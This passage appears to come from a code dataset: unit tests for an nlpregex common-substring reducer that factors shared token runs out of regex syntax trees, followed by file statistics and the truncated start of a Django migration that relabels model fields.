    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T4_11 T5_12 T6_13 T12_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't4%t5%t6' )
def test_find_best_regex_0008( self ):
    """A shared run t3 t4 t5 crossing different offsets is found."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T3_12 T4_13 T5_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't3%t4%t5' )
def test_find_best_regex_0009( self ):
    """A shared suffix run t4 t5 t6 at the same offset is found."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T4_12 T5_13 T6_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't4%t5%t6' )
def test_find_best_regex_0010( self ):
    """With t1 t2 t3 repeated twice in both series, the repeated triple wins."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
S_2:T1_9 T2_10 T3_11 T1_12 T2_13 T3_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't1%t2%t3' )
def test_find_best_regex_0011( self ):
    """Self-overlap within a single series still produces t1 t2 t3."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't1%t2%t3' )
def test_find_best_regex_0012( self ):
    """Best substring may span union and optional subtrees, not just terminals."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 |_4 T3_5 ?_6 T5_7 T6_8
S_2:T7_9 T8_10 |_11 T3_12 ?_13 T9_14
|_4:T10_15 T11_16
?_6:T12_17
|_11:T10_18 T11_19
?_13:T12_20
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, '( t10 | t11 )%t3%t12 ?' )
def test_remove_children_and_replace_with_nonterminal_0001(self):
    """Collapsing 3 children starting at position 1 into nonterminal N1."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [1] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:T2_2 N1_7 T6_6
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0002(self):
    """Collapsing 3 children at the head of the series into nonterminal N1."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [0] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:N1_7 T5_5 T6_6
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0003(self):
    """Collapsing 3 children at the tail of the series into nonterminal N1."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [2] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:T2_2 T3_3 N1_7
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0004(self):
    """Replacing the entire series (all 5 children) collapses S_1 into N1 under R_0."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 5, [0] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:N1_1
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0005(self):
    """Two non-overlapping 3-child occurrences both collapse into N1."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [0, 3] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:N1_8 N1_9
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0006(self):
    """Three 2-child occurrences at positions 0, 2, 4 all collapse into N1."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [0, 2, 4] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:N1_8 N1_9 N1_10
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0007(self):
    """Adjacent 2-child occurrences at positions 1 and 3 collapse into two N1s."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [1, 3] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:T2_2 N1_8 N1_9 T4_7
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0008(self):
    """Non-adjacent 2-child occurrences at positions 1 and 4 collapse into two N1s."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [1, 4] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:T2_2 N1_8 T2_5 N1_9
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_remove_children_and_replace_with_nonterminal_0009(self):
    """2-child occurrences at the head (0) and near the tail (4) collapse into N1s."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [0, 4] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1
S_1:N1_8 T4_4 T2_5 N1_9
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
def test_move_children_to_new_tree_0001(self):
    """Moving 3 children at position 1 into a new tree registered as 'n1'."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.move_children_to_new_tree( ast00, 'n1', 3, [1] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1 S_8
S_1:T2_2 N1_7 T6_6
S_8:T3_3 T4_4 T5_5
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
    ast01 = self.helper.get_node( forrest01, 8 )
    self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0002(self):
    """Moving 3 children from the head of the series into a new 'n1' tree."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.move_children_to_new_tree( ast00, 'n1', 3, [0] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1 S_8
S_1:N1_7 T5_5 T6_6
S_8:T2_2 T3_3 T4_4
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
    ast01 = self.helper.get_node( forrest01, 8 )
    self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0003(self):
    """Moving 3 children from the tail of the series into a new 'n1' tree."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.move_children_to_new_tree( ast00, 'n1', 3, [2] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1 S_8
S_1:T2_2 T3_3 N1_7
S_8:T4_4 T5_5 T6_6
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
    ast01 = self.helper.get_node( forrest01, 8 )
    self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0004(self):
    """Moving the entire series (all 5 children) into a new 'n1' tree leaves N1 under R_0."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.move_children_to_new_tree( ast00, 'n1', 5, [0] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:N1_1 S_8
S_8:T2_2 T3_3 T4_4 T5_5 T6_6
'''
    # assertTrue reads better and fails clearer than assertEqual(..., True).
    self.assertTrue( self.helper.compare_specs( spec02, spec02_expected ) )
    ast01 = self.helper.get_node( forrest01, 8 )
    self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0005(self):
    """Exercise move_children_to_new_tree(width=3, positions=[0, 3]).

    NOTE(review): both assertions were present but commented out in the
    original, so the test ran the operation without verifying anything.
    They are re-enabled here; the expected spec follows the same node
    numbering pattern as the neighbouring 0006-0009 tests — confirm the
    expected output against a run of the suite.
    """
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    spec01 = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    ast00 = self.helper.get_node( forrest01, 1 )
    root01.children_map['n0'] = ast00
    forrest01.next_nonterminal_num = 1
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    reducer01.move_children_to_new_tree( ast00, 'n1', 3, [0, 3] )
    spec02 = self.helper.display_tree( forrest01.root )
    spec02_expected = '''
R_0:S_1 S_10
S_1:N1_8 N1_9
S_10:T2_2 T3_3 T4_4
'''
    self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
    ast01 = self.helper.get_node( forrest01, 10 )
    self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0006(self):
    """Exercise move_children_to_new_tree(width=2, positions=[0, 2, 4]);
    three occurrences of the run are replaced by N1 references."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    seq = self.helper.get_node(forest, 1)
    root.children_map['n0'] = seq
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.move_children_to_new_tree(seq, 'n1', 2, [0, 2, 4])
    expected = '''
R_0:S_1 S_11
S_1:N1_8 N1_9 N1_10
S_11:T2_2 T3_3
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The moved-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 11), root.children_map['n1'])
def test_move_children_to_new_tree_0007(self):
    """Exercise move_children_to_new_tree(width=2, positions=[1, 3]);
    adjacent occurrences in the middle of the sequence."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    seq = self.helper.get_node(forest, 1)
    root.children_map['n0'] = seq
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.move_children_to_new_tree(seq, 'n1', 2, [1, 3])
    expected = '''
R_0:S_1 S_10
S_1:T2_2 N1_8 N1_9 T4_7
S_10:T3_3 T4_4
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The moved-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 10), root.children_map['n1'])
def test_move_children_to_new_tree_0008(self):
    """Exercise move_children_to_new_tree(width=2, positions=[1, 4]);
    occurrences separated by an untouched child."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    seq = self.helper.get_node(forest, 1)
    root.children_map['n0'] = seq
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.move_children_to_new_tree(seq, 'n1', 2, [1, 4])
    expected = '''
R_0:S_1 S_10
S_1:T2_2 N1_8 T2_5 N1_9
S_10:T3_3 T4_4
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The moved-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 10), root.children_map['n1'])
def test_move_children_to_new_tree_0009(self):
    """Exercise move_children_to_new_tree(width=2, positions=[0, 4]);
    one occurrence at the very start, one near the end."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    seq = self.helper.get_node(forest, 1)
    root.children_map['n0'] = seq
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.move_children_to_new_tree(seq, 'n1', 2, [0, 4])
    expected = '''
R_0:S_1 S_10
S_1:N1_8 T4_4 T2_5 N1_9
S_10:T2_2 T3_3
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The moved-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 10), root.children_map['n1'])
def test_reduce_best_common_substring_0001(self):
    """reduce_best_common_substring on one sequence containing the run
    T2 T3 T4 twice; both occurrences should collapse to N1 references."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    seq = self.helper.get_node(forest, 1)
    root.children_map['n0'] = seq
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.reduce_best_common_substring()
    expected = '''
R_0:S_1 S_10
S_1:N1_8 N1_9
S_10:T2_2 T3_3 T4_4
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The factored-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 10), root.children_map['n1'])
def test_reduce_best_common_substring_0002(self):
    """reduce_best_common_substring across two alternative branches that each
    repeat the run T2 T3 T4 twice; all four occurrences become N1 references."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:|_1
|_1:S_2 S_3
S_2:T2_4 T3_5 T4_6 T2_7 T3_8 T4_9
S_3:T2_10 T3_11 T4_12 T2_13 T3_14 T4_15
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    alt = self.helper.get_node(forest, 1)
    root.children_map['n0'] = alt
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.reduce_best_common_substring()
    expected = '''
R_0:|_1 S_18
|_1:S_2 S_3
S_2:N1_16 N1_17
S_3:N1_19 N1_20
S_18:T2_4 T3_5 T4_6
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The factored-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 18), root.children_map['n1'])
def test_reduce_best_common_substring_0003(self):
    """reduce_best_common_substring across three branches that share the run
    T1 T2 T3 at different offsets; each occurrence becomes an N1 reference."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:|_1
|_1:S_2 S_3 S_4
S_2:T5_5 T1_6 T2_7 T3_8
S_3:T9_9 T1_10 T2_11 T3_12 T13_13 T14_14
S_4:T1_15 T2_16 T3_17 T18_18 T19_19 T20_20
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    alt = self.helper.get_node(forest, 1)
    root.children_map['n0'] = alt
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.reduce_best_common_substring()
    expected = '''
R_0:|_1 S_22
|_1:S_2 S_3 S_4
S_2:T5_5 N1_21
S_3:T9_9 N1_23 T13_13 T14_14
S_4:N1_24 T18_18 T19_19 T20_20
S_22:T1_6 T2_7 T3_8
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    # The factored-out subtree must be registered on the root as 'n1'.
    self.assertEqual(self.helper.get_node(forest, 22), root.children_map['n1'])
def test_reduce_0001(self):
    """Full reduce() pass over three branches; per the expected spec, two
    distinct common substrings are factored out and registered on the root
    as 'n1' (S_22) and 'n2' (S_26)."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    input_spec = '''
R_0:|_1
|_1:S_2 S_3 S_4
S_2:T5_5 T1_6 T2_7 T3_8
S_3:T9_9 T1_10 T2_11 T3_12 T4_13 T5_14
S_4:T1_15 T2_16 T3_17 T4_18 T5_19 T20_20
'''
    root = self.helper.construct_ast_from_spec(forest, input_spec)
    forest.add_root(root)
    forest.visit_and_prepare_for_reduction(root)
    alt = self.helper.get_node(forest, 1)
    root.children_map['n0'] = alt
    forest.next_nonterminal_num = 1
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer(forest)
    reducer.reduce()
    expected = '''
R_0:|_1 S_22 S_26
|_1:S_2 S_3 S_4
S_2:T5_5 N1_21
S_3:T9_9 N2_25
S_4:N2_27 T20_20
S_22:T1_6 T2_7 T3_8
S_26:N1_23 T4_13 T5_14
'''
    self.assertEqual(self.helper.compare_specs(self.helper.display_tree(forest.root), expected), True)
    self.assertEqual(self.helper.get_node(forest, 22), root.children_map['n1'])
    self.assertEqual(self.helper.get_node(forest, 26), root.children_map['n2'])
# Run this test module directly (discovers and executes all TestCase methods).
if __name__ == '__main__':
    unittest.main()
| 35.139868
| 108
| 0.636208
| 7,917
| 63,814
| 4.784767
| 0.025262
| 0.103746
| 0.061297
| 0.029619
| 0.938993
| 0.913862
| 0.889866
| 0.884956
| 0.876983
| 0.868958
| 0
| 0.127543
| 0.278904
| 63,814
| 1,815
| 109
| 35.159229
| 0.695671
| 0.014683
| 0
| 0.788197
| 0
| 0
| 0.131943
| 0
| 0
| 0
| 0
| 0
| 0.210186
| 1
| 0.041229
| false
| 0
| 0.004042
| 0
| 0.049313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f3394ab945bb44bf29b7f0311a195be2c507b7
| 10,966
|
py
|
Python
|
data/migrations/0002_auto_20211221_2104.py
|
neversay4ever/herb
|
2309129607b3b09428d3930af5f3f5a76c4689e1
|
[
"MIT"
] | null | null | null |
data/migrations/0002_auto_20211221_2104.py
|
neversay4ever/herb
|
2309129607b3b09428d3930af5f3f5a76c4689e1
|
[
"MIT"
] | null | null | null |
data/migrations/0002_auto_20211221_2104.py
|
neversay4ever/herb
|
2309129607b3b09428d3930af5f3f5a76c4689e1
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.10 on 2021-12-21 13:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration 0002 for the ``data`` app.

    Every operation is an ``AlterField`` that re-declares a ``CharField``
    with ``max_length=250`` and a (mostly Chinese) ``verbose_name``.  The
    60 repetitive stanzas of the generated original are kept as a data
    table and expanded into identical ``AlterField`` operations, in the
    same order, by the comprehension below.
    """

    dependencies = [
        ('data', '0001_initial'),
    ]

    # (model_name, field_name, verbose_name) for every altered field,
    # in the exact order of the generated migration.
    # NOTE: 'palnt_class' is a typo in the actual model field name — do
    # not "fix" it here or the migration will not match the model state.
    _ALTERED_FIELDS = [
        ('assembly', 'gene_id', '基因ID'),
        ('assembly', 'gene_length', '基因长度'),
        ('assembly', 'herb_id', '药物编码'),
        ('assembly', 'tissue_id', '样本组织编码'),
        ('cog', 'cog_id', 'COG ID'),
        ('cog', 'gene', '基因名称'),
        ('cpc', 'gene', '基因名称'),
        ('cpc', 'label', '标签'),
        ('go', 'gene', '基因名称'),
        ('go', 'go_id', 'GO ID'),
        ('go', 'go_ontology', 'GO 本体'),
        ('go', 'go_term', 'GO 术语'),
        ('kegg', 'gene', '基因名称'),
        ('kegg', 'kegg_id', 'KEGG ID'),
        ('kog', 'gene', '基因名称'),
        ('kog', 'kog_id', 'KOG ID'),
        ('nr', 'gene', '基因名称'),
        ('nr', 'nr_id', 'NR ID'),
        ('pfam', 'gene', '基因名称'),
